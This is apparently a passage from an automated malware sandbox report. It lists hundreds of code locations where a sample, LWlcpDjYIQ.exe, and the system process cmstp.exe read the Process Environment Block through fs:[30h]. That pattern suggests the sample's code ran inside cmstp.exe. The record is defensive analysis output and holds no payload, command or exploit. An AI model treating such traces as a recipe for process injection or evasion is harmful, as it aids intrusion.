          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A5BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00AA6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00AF740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A4746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A5A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00ABC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00AF05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A535A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A51DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A52581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A22D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A5FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00A3D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 2_2_00AEFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AD8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A2AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AEE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AAA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A54D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A54D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A54D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A4C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A4C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A63D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AD3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A47D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00ABFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A376E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A516E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A68EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A536CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00ADFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A2E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00ADFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A2C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A2C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A2C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A58E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AE1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A5A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A5A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A3766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A4AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A4AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A4AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A4AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A4AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AEAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AEAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A38794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A637F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A24F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A24F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A5E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04732073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04741074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0469746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0470C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0470C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046AA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04690050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04690050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0468B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0468B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0468B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0468B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046ABC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04744015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04744015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04731C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04731C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04731C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04731C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04731C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04731C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04731C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04731C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04731C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04731C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04731C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04731C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04731C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04731C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0474740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0474740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0474740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_047314FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046758EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0470B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0470B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0470B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0470B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0470B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0470B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04748CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046AF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046AF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046AF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04679080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0468849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0467C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0467B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0467B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0469C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0469C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0469B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0469B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04697D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04748D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04694120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04694120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04694120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04694120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04694120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0473E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0467AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046FA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04683D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04683D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04683D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04683D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04683D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04683D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04683D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04683D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04683D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04683D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04683D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04683D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04683D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04679100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04679100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04679100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04728DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0467B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0467B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0467B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0468D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0468D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0473FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0473FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0473FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0473FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_047041E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046F51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_047405AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_047405AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0469C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04672D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04672D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04672D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04672D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04672D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046AA185 mov eax, dword ptr fs:[00000030h]
